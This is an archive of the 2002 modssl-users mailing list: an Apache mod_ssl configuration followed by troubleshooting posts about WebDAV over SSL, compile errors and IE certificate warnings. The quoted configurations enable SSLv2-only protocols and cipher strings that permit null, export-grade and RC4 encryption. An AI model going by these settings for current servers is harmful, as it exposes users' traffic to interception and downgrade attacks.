AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl    .crl

#   Pass Phrase Dialog:
#   Configure the pass phrase gathering process.
#   The filtering dialog program (`builtin' is a internal
#   terminal dialog) has to provide the pass phrase on stdout.
SSLPassPhraseDialog  builtin

#   Inter-Process Session Cache:
#   Configure the SSL Session Cache: First the mechanism=20
#   to use and second the expiring timeout (in seconds).
#SSLSessionCache        none
#SSLSessionCache        shmht:logs/ssl_scache(512000)
#SSLSessionCache        shmcb:logs/ssl_scache(512000)
SSLSessionCache         dbm:logs/ssl_scache
SSLSessionCacheTimeout  300

#   Semaphore:
#   Configure the path to the mutual exclusion semaphore the
#   SSL engine uses internally for inter-process synchronization.=20
SSLMutex  file:logs/ssl_mutex

#   Pseudo Random Number Generator (PRNG):
#   Configure one or more sources to seed the PRNG of the=20
#   SSL library. The seed data should be of good random quality.
#   WARNING! On some platforms /dev/random blocks if not enough entropy
#   is available. This means you then cannot use the /dev/random device
#   because it would lead to very long connection times (as long as
#   it requires to make more entropy available). But usually those
#   platforms additionally provide a /dev/urandom device which doesn't
#   block. So, if available, use this one instead. Read the mod_ssl User
#   Manual for more details.
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
#SSLRandomSeed startup file:/dev/random  512
#SSLRandomSeed startup file:/dev/urandom 512
#SSLRandomSeed connect file:/dev/random  512
#SSLRandomSeed connect file:/dev/urandom 512

##
## SSL Virtual Host Context
##



#  General setup for the virtual host
DocumentRoot "C:/Program files/Apache Group/Apache2/htdocs"
ServerName doorstop.mayo.edu:443
ServerAdmin paulb@mayo.edu
ErrorLog logs/error_log
TransferLog logs/access_log

#   SSL Engine Switch:
#   Enable/Disable SSL for this virtual host.
SSLEngine on

#   SSL Cipher Suite:
#   List the ciphers that the client is permitted to negotiate.
#   See the mod_ssl documentation for a complete list.
SSLCipherSuite =
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

#   Server Certificate:
#   Point SSLCertificateFile at a PEM encoded certificate.  If
#   the certificate is encrypted, then you will be prompted for a
#   pass phrase.  Note that a kill -HUP will prompt again.  Keep
#   in mind that if you have both an RSA and a DSA certificate you
#   can configure both in parallel (to also allow the use of DSA
#   ciphers, etc.)
SSLCertificateFile C:/Program Files/Apache =
Group/Apache2/conf/ssl/doorstop.crt
#SSLCertificateFile C:/Program Files/Apache =
Group/Apache2/conf/ssl.crt/server-dsa.crt

#   Server Private Key:
#   If the key is not combined with the certificate, use this
#   directive to point at the key file.  Keep in mind that if
#   you've both a RSA and a DSA private key you can configure
#   both in parallel (to also allow the use of DSA ciphers, etc.)
SSLCertificateKeyFile C:/Program Files/Apache =
Group/Apache2/conf/ssl/doorstop.key
#SSLCertificateKeyFile C:/Apache2/conf/ssl.key/server-dsa.key

#   Server Certificate Chain:
#   Point SSLCertificateChainFile at a file containing the
#   concatenation of PEM encoded CA certificates which form the
#   certificate chain for the server certificate. Alternatively
#   the referenced file can be the same as SSLCertificateFile
#   when the CA certificates are directly appended to the server
#   certificate for convinience.
#SSLCertificateChainFile C:/Apache2/conf/ssl.crt/ca.crt

#   Certificate Authority (CA):
#   Set the CA certificate verification path where to find CA
#   certificates for client authentication or alternatively one
#   huge file containing all of them (file must be PEM encoded)
#   Note: Inside SSLCACertificatePath you need hash symlinks
#         to point to the certificate files. Use the provided
#         Makefile to update the hash symlinks after changes.
#SSLCACertificatePath C:/Apache2/conf/ssl.crt
#SSLCACertificateFile C:/Apache2/conf/ssl.crt/ca-bundle.crt

#   Certificate Revocation Lists (CRL):
#   Set the CA revocation path where to find CA CRLs for client
#   authentication or alternatively one huge file containing all
#   of them (file must be PEM encoded)
#   Note: Inside SSLCARevocationPath you need hash symlinks
#         to point to the certificate files. Use the provided
#         Makefile to update the hash symlinks after changes.
#SSLCARevocationPath C:/Apache2/conf/ssl.crl
#SSLCARevocationFile C:/Apache2/conf/ssl.crl/ca-bundle.crl

#   Client Authentication (Type):
#   Client certificate verification type and depth.  Types are
#   none, optional, require and optional_no_ca.  Depth is a
#   number which specifies how deeply to verify the certificate
#   issuer chain before deciding the certificate is not valid.
#SSLVerifyClient require
#SSLVerifyDepth  10

#   Access Control:
#   With SSLRequire you can do per-directory access control based
#   on arbitrary complex boolean expressions containing server
#   variable checks and other lookup directives.  The syntax is a
#   mixture between C and Perl.  See the mod_ssl documentation
#   for more details.
#
#SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \
#            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
#            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
#            and %{TIME_WDAY} >=3D 1 and %{TIME_WDAY} <=3D 5 \
#            and %{TIME_HOUR} >=3D 8 and %{TIME_HOUR} <=3D 20       ) \
#           or %{REMOTE_ADDR} =3D~ m/^192\.76\.162\.[0-9]+$/
#

#   SSL Engine Options:
#   Set various options for the SSL engine.
#   o FakeBasicAuth:
#     Translate the client X.509 into a Basic Authorisation.  This means =
that
#     the standard Auth/DBMAuth methods can be used for access control.  =
The
#     user name is the `one line' version of the client's X.509 =
certificate.
#     Note that no password is obtained from the user. Every entry in =
the user
#     file needs this password: `xxj31ZMTZzkVA'.
#   o ExportCertData:
#     This exports two additional environment variables: SSL_CLIENT_CERT =
and
#     SSL_SERVER_CERT. These contain the PEM-encoded certificates of the
#     server (always existing) and the client (only existing when client
#     authentication is used). This can be used to import the =
certificates
#     into CGI scripts.
#   o StdEnvVars:
#     This exports the standard SSL/TLS related `SSL_*' environment =
variables.
#     Per default this exportation is switched off for performance =
reasons,
#     because the extraction step is an expensive operation and is =
usually
#     useless for serving static content. So one usually enables the
#     exportation for CGI and SSI requests only.
#   o CompatEnvVars:
#     This exports obsolete environment variables for backward =
compatibility
#     to Apache-SSL 1.x, mod_ssl 2.0.x, Sioux 1.0 and Stronghold 2.x. =
Use this
#     to provide compatibility to existing CGI scripts.
#   o StrictRequire:
#     This denies access when "SSLRequireSSL" or "SSLRequire" applied =
even
#     under a "Satisfy any" situation, i.e. when it applies access is =
denied
#     and no other module can change it.
#   o OptRenegotiate:
#     This enables optimized SSL connection renegotiation handling when =
SSL
#     directives are used in per-directory context.=20
#SSLOptions +FakeBasicAuth +ExportCertData +CompatEnvVars +StrictRequire

    SSLOptions +StdEnvVars


    SSLOptions +StdEnvVars


#   SSL Protocol Adjustments:
#   The safe and default but still SSL/TLS standard compliant shutdown
#   approach is that mod_ssl sends the close notify alert but doesn't =
wait for
#   the close notify alert from client. When you need a different =
shutdown
#   approach you can use one of the following variables:
#   o ssl-unclean-shutdown:
#     This forces an unclean shutdown when the connection is closed, =
i.e. no
#     SSL close notify alert is send or allowed to received.  This =
violates
#     the SSL/TLS standard but is needed for some brain-dead browsers. =
Use
#     this when you receive I/O errors because of the standard approach =
where
#     mod_ssl sends the close notify alert.
#   o ssl-accurate-shutdown:
#     This forces an accurate shutdown when the connection is closed, =
i.e. a
#     SSL close notify alert is send and mod_ssl waits for the close =
notify
#     alert of the client. This is 100% SSL/TLS standard compliant, but =
in
#     practice often causes hanging connections with brain-dead =
browsers. Use
#     this only for browsers where you know that their SSL =
implementation
#     works correctly.=20
#   Notice: Most problems of broken clients are also related to the HTTP
#   keep-alive facility, so you usually additionally want to disable
#   keep-alive for those clients, too. Use variable "nokeepalive" for =
this.
#   Similarly, one has to force some clients to use HTTP/1.0 to =
workaround
#   their broken HTTP/1.1 implementation. Use variables "downgrade-1.0" =
and
#   "force-response-1.0" for this.
SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

#   Per-Server Logging:
#   The home of a custom SSL log file. Use this when you want a
#   compact non-error SSL logfile on a virtual host basis.
CustomLog logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"

                                 =20




------=_NextPart_000_01E5_01C2534B.0AE35B40--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  4 17:59:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA17056; Wed, 4 Sep 2002 17:58:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from c3po.skynet.be id RAA17050; Wed, 4 Sep 2002 17:57:07 +0200 (MET DST)
Received: from Anakin (189.124-200-80.adsl.skynet.be [80.200.124.189])
	by c3po.skynet.be (8.11.6/8.11.6/Skynet-OUT-2.20) with SMTP id g84Fux729190
	for ; Wed, 4 Sep 2002 17:57:00 +0200 (MET DST)
	(envelope-from )
From: "Thierry Cabuzel" 
To: 
Subject: Apache + VirtualHost + WebDAV + mod_ssl
Date: Wed, 4 Sep 2002 18:01:28 +0200
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
In-Reply-To: <01e401c25374$f3b96340$57d4b081@doorstop>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Thierry Cabuzel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I am new to this list. I am trying to explain my problem and how I can solve
it with mod_ssl. For that I have a load of questions :-)

My setup:
 - Win 98
 - Apache 1.3.24
 - WebDAV 1.0.3
 - PHP 4.2.0
 - gzip 1.3.19.1a

What I try to do:
I try to host some websites for my family.
For that I use a bunch of virtualhost, each site has his virtual host name.
For each site there is a WebFolder Access to edit pages.

They are stored like this:

  Path
     ->  URL
     ->  WebDAV Web Folder

  d:/webroot/www/Site1/
     ->  http://site1.server.net/
     ->  http://server.net/dav_site1/  (/dav_site1/ alias of www/site1/)
  d:/webroot/www/Site2/
     ->  http://site2.server.net/
     ->  http://server.net/dav_site2/  (/dav_site2/ alias of www/site2/)
  d:/webroot/www/Site3/
     ->  http://site3.server.net/
     ->  http://server.net/dav_site3/  (/dav_site3/ alias of www/site3/)

As you seen I have a bunch of virtual host for all the sites. And just 1
host with a bunch of alias for webDAV.
To this point I have no problem and this is work very well.

BUT, some old firewall doesn't support the http WebDAV extension. For this,
mod_ssl is the solution: Encrypt WebDAV in a ssl tunnel. At this point old
firewall just let the SSL canal pass thru and with ssl, WebDAV :-) If I have
read correctly SSL doesn't work on virtual host and I don't need it. I just
need it on the aliased hosts going thru SSl.

NOW the questions :-)

Is it possible to keep all my ordinary sites on the http protocol and put
the WebDAV web folder on https ?
I have downloaded "Apache_1.3.24-Mod_SSL_2.8.8-OpenSSL_0.9.6c-WIN32.zip". Is
it enough ?
How I can configure my httpd.conf ?

Thank for the help.

Thierry Cabuzel


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  4 20:00:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA19269; Wed, 4 Sep 2002 19:59:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from schnarff.com id TAA19251; Wed, 4 Sep 2002 19:58:39 +0200 (MET DST)
Received: (qmail 26146 invoked by uid 1000); 4 Sep 2002 18:01:13 -0000
Message-ID: <20020904180113.6787.qmail@schnarff.com>
From: "Alex Kirk" 
To: modssl-users@modssl.org
Subject: No such module 'ssl'
Date: Wed, 04 Sep 2002 18:01:12 GMT
Mime-Version: 1.0
Content-Type: text/plain; format=flowed; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Alex Kirk" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Since my question about MAGIC_COOKIE_EAPI was never answered, I'm coming 
back at the same general problem from a different angle. 

I'm still trying to compile Apache 1.3.26 with Mod_SSL 2.8.10. Following the 
instructions, I've successfully compiled OpenSSL 0.9.6g; however, I didn't 
"fully" put it onto my system, it's currently living in 
/home/packages/openssl-0.9.6g. Next, I configured mod_ssl with that location 
of OpenSSL; it had no problems. However, when I try to configure Apache with 
this line: 

SSL_BASE=/home/packages/openssl-0.9.6g/ ./configure --enable-module=ssl 
 --prefix=/usr/local/apache/ --enable-module=so 
 --activate-module=src/modules/perl/libperl.a 
 --activate-module=src/modules/php4/libphp4.a 

I get an immediate error of "configure:Error: No such module named 'ssl'". 

This would seem to be something pretty obvious/basic. What might I be doing 
wrong here? 

Alex Kirk
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  4 20:34:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA20534; Wed, 4 Sep 2002 20:33:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange-ulis.ulis.zencod.com id UAA20526; Wed, 4 Sep 2002 20:32:17 +0200 (MET DST)
Subject: RE: No such module 'ssl'
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----_=_NextPart_001_01C25441.59D8DF01"
Date: Wed, 4 Sep 2002 20:31:57 +0200
content-class: urn:content-classes:message
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Message-ID: 
X-MS-TNEF-Correlator: 
Thread-Topic: No such module 'ssl'
Thread-Index: AcJUPQxgsvkV/qdeQi2aegKoIBy0KQAA9E+q
From: "Frederic DONNAT" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Frederic DONNAT" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C25441.59D8DF01
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: quoted-printable

Hi,=20

I've never try this way to configure ssl with apache !
Usually i use something like this :
./configure --prefix=3D/path/to/pache_install \
	--with-apache=3D/path/to/apache_src \
	--with-ssl=3D/path/to/openssl_src
	...
and it works fine.

I think you should try "--with-ssl" option.

regards

Fred


-----Original Message-----
From:	Alex Kirk [mailto:alex@schnarff.com]
Sent:	Wed 09/04/2002 8:01 PM
To:	modssl-users@modssl.org
Cc:=09
Subject:	No such module 'ssl'

Since my question about MAGIC_COOKIE_EAPI was never answered, I'm coming =

back at the same general problem from a different angle.=20

I'm still trying to compile Apache 1.3.26 with Mod_SSL 2.8.10. Following =
the=20
instructions, I've successfully compiled OpenSSL 0.9.6g; however, I =
didn't=20
"fully" put it onto my system, it's currently living in=20
/home/packages/openssl-0.9.6g. Next, I configured mod_ssl with that =
location=20
of OpenSSL; it had no problems. However, when I try to configure Apache =
with=20
this line:=20

SSL_BASE=3D/home/packages/openssl-0.9.6g/ ./configure =
--enable-module=3Dssl=20
 --prefix=3D/usr/local/apache/ --enable-module=3Dso=20
 --activate-module=3Dsrc/modules/perl/libperl.a=20
 --activate-module=3Dsrc/modules/php4/libphp4.a=20

I get an immediate error of "configure:Error: No such module named =
'ssl'".=20

This would seem to be something pretty obvious/basic. What might I be =
doing=20
wrong here?=20

Alex Kirk
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org




------_=_NextPart_001_01C25441.59D8DF01
Content-Type: application/ms-tnef;
	name="winmail.dat"
Content-Transfer-Encoding: base64

eJ8+IjsSAQaQCAAEAAAAAAABAAEAAQeQBgAIAAAA5AQAAAAAAADoAAEIgAcAGAAAAElQTS5NaWNy
b3NvZnQgTWFpbC5Ob3RlADEIAQ2ABAACAAAAAgACAAEEgAEAGQAAAFJFOiBObyBzdWNoIG1vZHVs
ZSAnc3NsJwDnBwEFgAMADgAAANIHCQAEABQAHwA5AAMAVQEBIIADAA4AAADSBwkABAAUAB8AOQAD
AFUBAQmAAQAhAAAAMjk1QTgxMDMzQTEyNTE0OUIwMEY5NTQzQ0ZCRTYyQTkABgcBA5AGAGQLAAA3
AAAAAwAmAAAAAAADADYAAAAAAEAAOQAB39hZQVTCAR4APQABAAAABQAAAFJFOiAAAAAAAgFHAAEA
AAA0AAAAYz11czthPSA7cD1aRU5DT0Q7bD1FWENIQU5HRS1VTElTLTAyMDkwNDE4MzE1N1otMjE1
AB4ASQABAAAAFQAAAE5vIHN1Y2ggbW9kdWxlICdzc2wnAAAAAEAATgAApLwNPVTCAR4AWgABAAAA
CgAAAEFsZXggS2lyawAAAAIBWwABAAAAOQAAAAAAAACBKx+kvqMQGZ1uAN0BD1QCAAAAAEFsZXgg
S2lyawBTTVRQAGFsZXhAc2NobmFyZmYuY29tAAAAAAIBXAABAAAAFwAAAFNNVFA6QUxFWEBTQ0hO
QVJGRi5DT00AAB4AXQABAAAACgAAAEFsZXggS2lyawAAAAIBXgABAAAAOQAAAAAAAACBKx+kvqMQ
GZ1uAN0BD1QCAAAAAEFsZXggS2lyawBTTVRQAGFsZXhAc2NobmFyZmYuY29tAAAAAAIBXwABAAAA
FwAAAFNNVFA6QUxFWEBTQ0hOQVJGRi5DT00AAB4AZgABAAAABQAAAFNNVFAAAAAAHgBnAAEAAAAS
AAAAYWxleEBzY2huYXJmZi5jb20AAAAeAGgAAQAAAAUAAABTTVRQAAAAAB4AaQABAAAAEgAAAGFs
ZXhAc2NobmFyZmYuY29tAAAAHgBwAAEAAAAVAAAATm8gc3VjaCBtb2R1bGUgJ3NzbCcAAAAAAgFx
AAEAAAAbAAAAAcJUPQxgsvkV/qdeQi2aegKoIBy0KQAA9E+qAB4AdAABAAAAGAAAAG1vZHNzbC11
c2Vyc0Btb2Rzc2wub3JnAB4AGgwBAAAAEAAAAEZyZWRlcmljIERPTk5BVAAeAB0OAQAAABUAAABO
byBzdWNoIG1vZHVsZSAnc3NsJwAAAAACAQkQAQAAABAFAAAMBQAAmggAAExaRnVbxG54AwAKAHJj
cGcxMjXiMgNDdGV4BUEBAwH3/wqAAqQD5AcTAoAP8wBQBFY/CFUHshElDlEDAQIAY2jhCsBzZXQy
BgAGwxEl9jMERhO3MBIsETMI7wn3tjsYHw4wNREiDGBjAFAzCwkBZDM2FlALpiBIHGksCuMKhAqA
SSd2MGUgbmUeEAXAdHKKeR6QaAQAIHdhHsGEbyAFoG5maWcIcJ8eIAQQAyAD8B7gIGEKsIsT0B4g
IR00VXN1B0DibB7AaSB1FBAgMANwAxQgHvBuZyBsaWtLHiAe4zodNC4vH6gtjC1wGCAf0Hg9Lwqw
XR7gLx9wJZEhAV8LgHP/AZAh8AMwJwAdRAGRJPEggg4tINQliCDUX3NyY88m/ygCIEEliG9wCfAg
QbspoioZLi1gHTQAcGQiIPUFQHcFsGsEIB/QHkAthcMdlR7SbmsgeQhgIDBaaAhgbC4QHqIiKsgi
ciAsAHRpAiAvCxggZ/ULEXMdOkYYIR06HTQlAPU10U8FEGcLgAdABdAHkPBzYWdlNdM0FgNwI9CJ
J5JBbA7AIEtpLoDcIFsAwAMQH3A6B0AOwKpABPBoNnByASAuBaC8bV0dNAZgAjA4FFcJgIAgMDkv
MDQvAdACMBRAODowMSBQek0dNFQ5cCeDBGEgQS2rIlEUAEA99C4FsGcdNIxDYzgUOrV1YmoFkP07
RU4fgCHAE9A94jDAHiCqJyBBJx06UwuAYx4g+m0ewHEKUCagMkEgwAbgAnUFQE1BR0lDXwBDT09L
SUVfRXxBUC/QHzAEIB5EAHF3rwSQCYAdEB3wbR+RbSLyfR00YgDQMDAlsB7RICFhbQeAIDcAHkBy
NoElIG+dAmBlR3ADUiDAIGQGkK5mRvECMEahZziALh0tP0dwRDEm0R6hIvIfc21wCwMQHiBBIOQx
LjMuFDI2IHRNBHBfU1MATCAyLjguMTD9S9BGBvAXsAPwTZIhER007SaCchrQMjJzRzIeEUGhe0Og
BBBmMMAiAU31LhBPBywRT+JQcDkuNmc7PiAwoEbgHmFHMUrRZG62JwVBHUMiU4Mx8HBEwc8uMQIh
H4BD0XN5JqBKQP8dECCQQmAfkAhwSzIiASMw7nYi8guAHSUvMKAHgCYS6ms28XMr9i1U9EvQB8D/
DtBV4h+nLhAEYSmgIFYe4DtIsRewYyWwRFIdNG9m31RmVVAuMRPgLhBuH4BJ9epzS9BIVYZ3IRAD
oC/R/x6yH4pOdSCDHTQe4yMwHkAGOh0rT+FfQkFTRfclgFrvW/kvLVAkWwnwAaD1OIAtQfQ9IEId
NCT5IlD0ci9fEmwpNWkAae8fgHdrJwDQMjB2JbBqWCnAL7dB9FugLBBybLAjMGJw0p4uSsBuj2+f
cKJocDwwf3EidCFxly92NwBLYiIgbfcHgErgcqEgBJADYAXAYAHyIh+nOkV3AmXAQX02cOt2cUJU
IkvcVB7zMLMUEPtKQR9xYiJ6JSECQB7AShC/WfAIYFugSGAN0UvQV17SOUewZ2gFQC/QfGFkb71H
yHcDYCMBIRAYID8dK3s4dx00X4LPg9+E74X/X9uBdSDkSQIwBJBmANAjYcsfgFR2KF31KSCJ3x8g
PYsALj7OIbASgUCgcHDvF8EF0DkxIvJMBAAFQI3f944iPf8/CkFEwANxDrAuEH+Nk40QNnA3AAXA
km+OmWG+agWwf5AEYI//HTp9lpAeADUQAQAAAEcAAAA8QTlFRTAxMkMwNjg1Q0I0ODk4QTcwRUI0
NTk0QTZDQTcxMkU3MzJAZXhjaGFuZ2UtdWxpcy51bGlzLnplbmNvZC5jb20+AAAeAEcQAQAAAA8A
AABtZXNzYWdlL3JmYzgyMgAACwDyEAEAAAAfAPMQAQAAAD4AAABSAEUAJQAzAEEAIABOAG8AIABz
AHUAYwBoACAAbQBvAGQAdQBsAGUAIAAnAHMAcwBsACcALgBFAE0ATAAAAAAACwD2EAAAAABAAAcw
UcGY3UBUwgFAAAgw1yboWUFUwgEDAN4/5AQAAAMA8T8JAAAAHgD4PwEAAAAQAAAARnJlZGVyaWMg
RE9OTkFUAAIB+T8BAAAAYAAAAAAAAADcp0DIwEIQGrS5CAArL+GCAQAAAAAAAAAvTz1aRU5DT0Qv
T1U9UFJFTUlFUiBHUk9VUEUgQURNSU5JU1RSQVRJRi9DTj1SRUNJUElFTlRTL0NOPUZSRURFUklD
AB4A+j8BAAAAFQAAAFN5c3RlbSBBZG1pbmlzdHJhdG9yAAAAAAIB+z8BAAAAHgAAAAAAAADcp0DI
wEIQGrS5CAArL+GCAQAAAAAAAAAuAAAAAwD9P+QEAAADABlAAAAAAAMAGkAAAAAAAwAdQAAAAAAD
AB5AAAAAAB4AMEABAAAACQAAAEZSRURFUklDAAAAAB4AMUABAAAACQAAAEZSRURFUklDAAAAAB4A
MkABAAAAEgAAAGFsZXhAc2NobmFyZmYuY29tAAAAHgAzQAEAAAASAAAAYWxleEBzY2huYXJmZi5j
b20AAAAeADhAAQAAAAkAAABGUkVERVJJQwAAAAAeADlAAQAAAAIAAAAuAAAACwApAAAAAAALACMA
AAAAAAMABhCamiYCAwAHENsEAAADABAQAAAAAAMAERAAAAAAHgAIEAEAAABlAAAASEksSVZFTkVW
RVJUUllUSElTV0FZVE9DT05GSUdVUkVTU0xXSVRIQVBBQ0hFVVNVQUxMWUlVU0VTT01FVEhJTkdM
SUtFVEhJUzovQ09ORklHVVJFLS1QUkVGSVg9L1BBVEgvVAAAAAACAX8AAQAAAEcAAAA8QTlFRTAx
MkMwNjg1Q0I0ODk4QTcwRUI0NTk0QTZDQTcxMkU3MzJAZXhjaGFuZ2UtdWxpcy51bGlzLnplbmNv
ZC5jb20+AAAV+A==

------_=_NextPart_001_01C25441.59D8DF01--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  4 23:40:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA25010; Wed, 4 Sep 2002 23:39:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from marvin-lnx.staff.tdk.net id XAA25005; Wed, 4 Sep 2002 23:39:06 +0200 (MET DST)
Received: by marvin-lnx.staff.tdk.net (Postfix, from userid 500)
	id C47CBBD2E; Wed,  4 Sep 2002 23:40:00 +0200 (CEST)
Date: Wed, 4 Sep 2002 23:40:00 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Apache + VirtualHost + WebDAV + mod_ssl
Message-ID: <20020904214000.GA24537@marvin-lnx.staff.tdk.net>
Mail-Followup-To: modssl-users@modssl.org
References: <01e401c25374$f3b96340$57d4b081@doorstop> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, Sep 04, 2002 at 06:01:28PM +0200, Thierry Cabuzel wrote:
> Is it possible to keep all my ordinary sites on the http protocol and put
> the WebDAV web folder on https ?

yes

> I have downloaded "Apache_1.3.24-Mod_SSL_2.8.8-OpenSSL_0.9.6c-WIN32.zip". Is
> it enough ?


you need newer versions - apache should be 1.3.26 and openssl also needs
to be the latest version.

> How I can configure my httpd.conf ?

Use the default mod_ssl httpd.conf along with the docs to do that.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  4 23:47:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA25180; Wed, 4 Sep 2002 23:46:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from schnarff.com id XAA25174; Wed, 4 Sep 2002 23:45:28 +0200 (MET DST)
Received: (qmail 28073 invoked by uid 1000); 4 Sep 2002 21:48:09 -0000
Message-ID: <20020904214809.3781.qmail@schnarff.com>
References: 
In-Reply-To:  
From: "Alex Kirk" 
To: modssl-users@modssl.org
Subject: Re: No such module 'ssl'
Date: Wed, 04 Sep 2002 21:48:09 GMT
Mime-Version: 1.0
Content-Type: text/plain; format=flowed; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Alex Kirk" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> I think you should try "--with-ssl" option.

configure:Error: invalid option '--with-ssl=src/modules/ssl/' 

No, I don't think so. Thanks for the thought though. Any other ideas on how 
I should be doing this? 

Alex Kirk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep  5 06:34:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA04842; Thu, 5 Sep 2002 06:33:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from rdsl_mlb_mx1.requestdsl.com.au id GAA04837; Thu, 5 Sep 2002 06:32:08 +0200 (MET DST)
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: IE not able to view  the CA certificate 
Date: Thu, 5 Sep 2002 14:29:31 +1000
Message-ID: <25B12856E53F0047BE90FB2CFC0D1B5935B714@rdsl_mlb_mx1.requestdsl.com.au>
Thread-Topic: No such module 'ssl'
Thread-Index: AcJUXIhymPLOJElgRgGvnNfiZz203AAMf8xA
From: "Vince Montuoro" 
To: 
Cc: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id GAA04839
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Vince Montuoro" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I'm finding that some browsers that require a CA certificate (eg-MacIe and early 56bit Ie browsers) are able to access my secure site but constantly get nagged with insecure certificate.

I have included the CA certificate but it still gives me the invalid certificate message, 


    SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown



SSLMutex sem
SSLRandomSeed startup builtin
SSLSessionCache dbm:/mindbridge/apache/logs/ssl_gcache_data
SSLSessionCacheTimeout 600


SSLProtocol -ALL +SSLv2 
SSLCipherSuite !EXP1024-RC4-SHA:!EXP1024-DES-CBC-SHA:ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

SSLLog logs/SSL.log
SSLLogLevel warn


SSLEngine On
SSLCertificateFile    conf/ssl/certs/my-server.cert
SSLCertificateKeyFile conf/ssl/private/my-server.key
SSLCACertificateFile  conf/ssl/ssl.crt/ca.crt




Thanks for your help

Vince 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
